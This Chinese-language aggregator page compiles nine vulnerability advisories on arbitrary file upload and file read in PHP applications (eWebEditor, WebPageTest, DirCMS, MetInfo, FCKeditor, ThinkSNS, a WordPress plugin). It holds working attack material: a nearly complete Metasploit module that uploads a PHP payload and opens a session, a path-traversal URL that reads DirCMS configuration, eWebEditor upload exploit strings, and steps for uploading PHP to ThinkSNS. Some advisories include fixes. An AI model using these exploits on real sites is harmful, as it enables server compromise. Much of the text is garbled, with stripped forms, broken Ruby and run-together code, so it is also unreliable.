ewebeditor(PHP) Ver 3.8 任意文件上传0day漏洞预警

时间：2022-11-25 06:26:05 作者：福气崽福气都在后头综合材料收藏本文下载本文

“福气崽福气都在后头”通过精心收集，向本站投稿了9篇ewebeditor(PHP) Ver 3.8 任意文件上传0day漏洞预警，以下是小编帮大家整理后的ewebeditor(PHP) Ver 3.8 任意文件上传0day漏洞预警，仅供参考，希望能够帮助到大家。

目录
第1篇：ewebeditor(PHP) Ver 3.8 任意文件上传0day漏洞预警第2篇：ewebeditor for php任意文件上传漏洞第3篇：WebPageTest任意php文件上传漏洞预警第4篇：DirCMS 任意文件读取0day漏洞预警第5篇：eWebeditoR3.8 for php任意文件上传EXP漏洞预警第6篇：MetInfov5.1.3 任意文件上传漏洞漏洞预警第7篇：Fckeditor =2.4.2 For php 任意上传文件漏洞第8篇：ThinkSNS又一个任意上传文件漏洞漏洞预警第9篇：WordPress Front End Upload v0.5.4.4任意php文件上传漏洞预警

篇1：ewebeditor(PHP) Ver 3.8 任意文件上传0day漏洞预警

eWebeditoR3.8 for php任意文件上EXP

URL:

0|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|w

av|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif

|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0

|||0|||||||||1|||0|||Office|||1|||zh- cn|||0|||500|||300|||0|||…|||FF00

00|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1″>

file:

篇2：ewebeditor for php任意文件上传漏洞

此漏洞仅测试了最新版v3.8,不知道低版本是否存在此漏洞，PHP版本的ewebeditor并没有使用数据库来保存配置信息，所有信息位于php/config.php中，代码如下：

$sUsername = ”admin“;

$sPassword = ”admin“;

$aStyle[1] = ”gray|||gray|||office|||../uploadfile/|||550|||350|||rar|zip|exe|doc|xls|chm|hlp|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office标准风格，部分常用按钮，标准适合界面宽度|||1|||zh-cn|||0|||500|||300|||0|||版权所有...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1|||1“;

........

它将所有的风格配置信息保存为一个数组$aStyle,在register_global为on的情况下我们可以任意添加自己喜欢的风格，然后就可以在自己添加的风格中可以随意定义可上传文件类型。

这漏洞成因很简单，下面给个exp

URL:

file:

漏洞修补方法：

初始化数组$aStyle

$sUsername = ”admin“;

$sPassword = ”admin“;

$aStyle. = array();

篇3：WebPageTest任意php文件上传漏洞预警

# This file is part of the Metasploit Framework and may be subject to

# redistribution and commercial restrictions. Please see the Metasploit

# Framework web site for more information on licensing and terms of use.

# metasploit.com/framework/

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info={})

super(update_info(info,

'Name' =>”WebPageTest Arbitrary PHP File Upload“,

'Description' =>%q{

This module exploits a vulnerability found in WebPageTest's Upload Feature. By

default, the resultimage.phpfile does not verify the user-supplied item before

saving it to disk, and then places this item in the web directory accessable by

remote users. This flaw can be abused to gain remote code execution.

'License' =>MSF_LICENSE,

'Author' =>

[

'dun', #Discovery, PoC

'sinn3r' #Metasploit

'References' =>

[

['OSVDB', '83822'],

['EDB', '19790']

'Payload' =>

{

'BadChars' =>”x00“

'DefaultOptions' =>

{

'ExitFunction' =>”none“

'Platform' =>['php'],

'Arch' =>ARCH_PHP,

'Targets' =>

[

['WebPageTest v2.6 or older', {}]

'Privileged' =>false,

'DisclosureDate' =>”Jul 13 “,

'DefaultTarget' =>0))

register_options(

[

OptString.new('TARGETURI', [true, 'The base path to WebPageTest', '/www/'])

], self.class)

end

def check

peer = ”#{rhost}:#{rport}“

target_uri.path << '/' if target_uri.path[-1,1] != '/'

base = File.dirname(”#{target_uri.path}.“)

res1 = send_request_raw({'uri'=>”#{base}/index.php“})

res2 = send_request_raw({'uri'=>”#{base}/work/resultimage.php“})

if res1 and res1.body =~ /WebPagetest - Website Performance and Optimization Test/ and

res2 and res2.code == 200

return Exploit::CheckCode::Vulnerable

end

return Exploit::CheckCode::Safe

end

def on_new_session(cli)

if cli.type != ”meterpreter“

print_error(”No automatic cleanup for you. Please manually remove: #{@target_path}“)

return

end

cli.core.use(”stdapi“) if not cli.ext.aliases.include?(”stdapi“)

cli.fs.file.rm(@target_path)

print_status(”#{@target_path} removed“)

end

def exploit

peer = ”#{rhost}:#{rport}“

target_uri.path << '/' if target_uri.path[-1,1] != '/'

base = File.dirname(”#{target_uri.path}.“)

p = payload.encoded

fname = ”blah.php“

data = Rex::MIME::Message.new

data.add_part(

”

'multipart/form-data', #Content Type

nil, #Transfer Encoding

“form-data; name=”file“; filename=”#{fname}“” #Content Disposition

)

print_status(“#{peer} - Uploading payload (#{p.length.to_s} bytes)...”)

res = send_request_cgi({

'method' =>'POST',

'uri' =>“#{base}/work/resultimage.php”,

'ctype' =>“multipart/form-data; boundary=#{data.bound}”,

'data' =>data.to_s

})

if not res

print_error(“#{peer} - No response from host”)

return

end www.xxxxo.com

@target_path = “#{base}/results/#{fname}”

print_status(“#{peer} - Requesting #{@target_path}”)

res = send_request_cgi({'uri'=>@target_path})

handler

if res and res.code == 404

print_error(“#{peer} - Payload failed to upload”)

end

篇4：DirCMS 任意文件读取0day漏洞预警

感觉时间真的过得真的很快，电脑一开一关一天就没了，不能这样下去，所以我打算抽出点时间来写博客和学习，记录一下自己的成长。

不管是程序员、还是安全工程师，读别人的代码无疑都是进步较快的方式，所以我觉得从今天起抽出时间来把站长网上的开源cms都看一遍，学习学习。

看到一套DirCms就把他下回来了，名字还蛮特别的(ps:小心我dir溢出你)。

貌似黑帽子们审计代码都是查找关键字和跟踪关键位置，自己定义好一个存在风险的函数和变量名列表。我又不是黑阔，所以我喜欢根据程序的架构一个一个文件慢慢看，随便学习下开发者的技巧。

当我看到/api/upload/swfthumbnail.php这个文件的时候，彻底无语了，只有短短的几十行代码。

如下：

// This script. accepts an ID and looks in the user's session for stored thumbnail name.

// It then streams the data to the browser from the file

// Work around the Flash Player Cookie Bug

if(isset($_POST[“PHPSESSID”])){//这个判断不会影响程序向下执行，不用管他

session_id($_POST[“PHPSESSID”]);

}

session_start;

//关键位置，我想说这个正则有啥用？ boss可以扣除这个程序员的资金了。

$image_id=isset($_GET[“id”])?preg_replace('/[^a-z0-9:./-]/i','',$_GET[“id”]):false;

//由于上面的正则问题，所以 $image_id 就算是恶意构造也是为真的

if($image_id===false)

{

header(“HTTP/1.1 500 Internal Server Error”);

echo“No ID”;

exit(0);

}

//只要id的值不以开头，而且文件存在就可以不进入里面了，

由于是读本地文件，当然不用开头，保证文件的存在可以用相对路径../../

if(substr($image_id,0,7)!=''&&!file_exists(“../../upload/image/”.$image_id))

{

header(“HTTP/1.1 404 Not found”);

exit(0);

}

//上面都通过了，这个当然没问题

if(substr($image_id,0,7)!='')

{

header(“Content-type: image/jpeg”);

header(“Content-length: ”.filesize(“../../upload/image/”.$image_id));

flush();

readfile(“../../upload/image/”.$image_id);//输出文件

}

else

{

header('location:'.$image_id);

}

exit(0);

测试版本为最新版：DirCMS Sp3

Exp：view-source:/api/upload/swfthumbnail.php?id=../../include/common.inc.php

已通知官方，请勿非法测试，产生后果与本人无关。

篇5：eWebeditoR3.8 for php任意文件上传EXP漏洞预警

eWebeditoR3.8 for php任意文件上EXP

URL:

file:

漏洞修补方法：

初始化数组$aStyle

$sUsername = “admin”;

$sPassword = “admin”;

$aStyle. = array();

$aStyle[1] = “gray|||gray|||office|||../uploadfile/|||550|||350|||rar|zip|exe|doc|xls|chm|hlp|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office标准风格，部分常用按钮，标准适合界面宽度|||1|||zh-cn|||0|||500|||300|||0|||版权所有...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1|||1”;

篇6：MetInfov5.1.3 任意文件上传漏洞漏洞预警

MetInfo 23号发布了新版本5.1.5，修补了本文提到的漏洞，当然严格来说应该是任意变量覆盖漏洞....

ps：欢迎各种形式，首发t00ls.net

注：请勿利用本文内容从事一切非法活动，否则后果自负

author:my5t3ry

废话不多说，看代码：

includecommon.inc.php20-39$db_settings=parse_ini_file(ROOTPATH.'config/config_db.php');@extract($db_settings);require_once ROOTPATH.'include/mysql_class.php';$db=newdbmysql;$db->dbconn($con_db_host,$con_db_id,$con_db_pass,$con_db_name);define('MAGIC_QUOTES_GPC',get_magic_quotes_gpc());isset($_REQUEST['GLOBALS'])&&exit('Access Error');require_once ROOTPATH.'include/global.func.php';foreach(array('_COOKIE','_POST','_GET')as$_request){foreach($$_requestas$_key=>$_value){$_key{0}!='_'&&$$_key=daddslashes($_value);}}$query=“select * from {$tablepre}config where name='met_tablename' and lang='metinfo'”;$mettable=$db->get_one($query);$mettables=explode('|',$mettable[value]);foreach($mettablesas$key=>$val){$tablename='met_'.$val;$$tablename=$tablepre.$val;}

metinfo系统通过查询数据库的{$tablepre}config表，并将获取的结果通过foreach循环初始化表名变量，其中的

是通过代码

$db_settings = parse_ini_file(ROOTPATH.'config/config_db.php'); @extract($db_settings);

来初始化的，然后在系统中使用这样“SELECT * FROM $met_message where id=$id and lang='$lang'”的SQL查询数据库，

其中的$met_message变量就是前面foreach循环初始化的变量……

我们可以覆盖$tablepre变量使表名初始化失败，进而提交表名变量.....

我找了个后台的上传页面，通过覆盖变量绕过后台验证并且覆盖允许上传后缀列表，构造上传漏洞，

MetInfov5.1.3 任意文件上传漏洞漏洞预警

，

exp：任意文件上传

任意文件上传

篇7：Fckeditor =2.4.2 For php 任意上传文件漏洞

lost.cq.cn

FCKeditor是一款非常优秀的HTML在线编辑器，在处理PHP上传的地方存在严重的安全漏洞

导致用户可以上传任意文件

在fckeditor/editor/filemanager/upload/php/upload.php 61行

$sType = isset( $_GET['Type'] ) ? $_GET['Type'] : 'File' ;

// Check if it is an allowed type.

if ( !in_array( $sType, array('File','Image','Flash','Media') ) )

SendResults( 1, '', '', 'Invalid type specified' ) ;

// Get the allowed and denied extensions arrays.

$arAllowed = $Config['AllowedExtensions'][$sType] ;

$arDenied = $Config['DeniedExtensions'][$sType] ;

// Check if it is an allowed extension.

if ( ( count($arAllowed) > 0 && !in_array( $sExtension, $arAllowed ) )

|| ( count($arDenied) > 0 && in_array( $sExtension,

$arDenied ) ) )

SendResults( '202' ) ;

程序从$_GET数组中获取Type变量，然后通过in_array进行类型判断，

但在config配置文件中

$Config['ForceSingleExtension'] = true ;

$Config['AllowedExtensions']['File'] = array() ;

$Config['DeniedExtensions']['File'] =

array('html','htm','php','php2','php3','php4','php5','phtml','pwml','inc','asp','aspx','ascx','jsp','cfm',

'cfc','pl','bat','exe','com','dll','vbs','js','reg','cgi','htaccess','asis') ;

$Config['AllowedExtensions']['Image'] =

array('jpg','gif','jpeg','png') ;

$Config['DeniedExtensions']['Image'] = array() ;

$Config['AllowedExtensions']['Flash'] = array('swf','fla') ;

$Config['DeniedExtensions']['Flash'] = array() ;

并未对Media类型进行上传文件类型的控制，导致用户上传任意文件

修补办法：更新到最新的2.5版本。或者在config.php文件中，添加对Media类型的文件类型限制

篇8：ThinkSNS又一个任意上传文件漏洞漏洞预警

某模块未对上传文件类型进行验证，可上传任意文件

代码产生位置

appswapLibActionIndexAction.class.php

263行

if(!empty($_FILES['pic']['name'])) { // 自动发一条图片微博

$data['pic'] = $_FILES['pic'];

$data['content'] = '图片分享';

$data['from'] = $this->_type_wap;

$res = api('Statuses')->data($data)->upload;

}

未对文件类型过滤

访问wap 模块

发一条微博并传图

firebug 地址

去掉small_然后访问

www.myhack58.com/data/uploads//1023/17/50865d481c217.php

修复方案：

对上传类型要进行检查

篇9：WordPress Front End Upload v0.5.4.4任意php文件上传漏洞预警

标题: WordPress Front End Upload v0.5.4.4 Arbitrary PHP File Upload Vulnerability

作者: Chris Kellum

主页: mondaybynoon.com/

软件地址: downloads.wordpress.org/plugin/front-end-upload.0.5.4.4.zip

影响版本: 0.5.4.4

缺陷分析

=====================

Plugin does not properly filter filetypes, which allows for the upload of filetypes in the following format:

filename.php.jpg

Vulnerable hosts will serve such files as a php file, allowing for malicious files to be uploaded and executed.

In creating the uploads folder for this plugin, the code utilizes uniqid to add a unique string to the upload folder name in order to better hide it from direct access.

Example:

www.xxxx.com/wp-content/uploads/feu_9fc12558ac71e6995808cfc590207e87/

However, many WordPress installations allow direct access to the /wp-content/uploads/ folder, so simply look for a folder name beginning with 'feu_' to locate your upload.

★ DirCMS 任意文件读取0day漏洞预警

★ Nginx %00空字节执行任意代码(php)漏洞漏洞预警

★ EasyTalk 微博本地文件包含漏洞漏洞预警

★ 漏洞Sun Solaris AT 指令可删除任意系统文件

★ FFFtp目录遍历漏洞可向任意位置写文件

★ phpWebThings = 1.5.2 MD5 Hash恢复/文件公开远程漏洞漏洞预警

★ 教你巧妙隐藏PHP文件后门

★ Shopv8 商城系统 v12.07 Cookies 注入漏洞漏洞预警

★ micecms一个鸡肋漏洞及修复附EXP漏洞预警

★ Andys PHP Knowledgebase 0.95.4 SQL注入漏洞及修复